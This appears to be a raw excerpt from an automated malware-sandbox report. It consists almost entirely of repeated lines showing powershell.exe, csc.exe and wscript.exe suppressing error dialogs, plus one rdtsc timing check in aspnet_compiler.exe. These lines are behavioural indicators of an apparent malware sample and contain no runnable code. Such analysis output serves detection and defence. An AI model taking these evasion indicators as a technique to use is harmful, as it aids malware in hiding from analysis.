Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132D1C0 rdtsc 12_2_0132D1C0
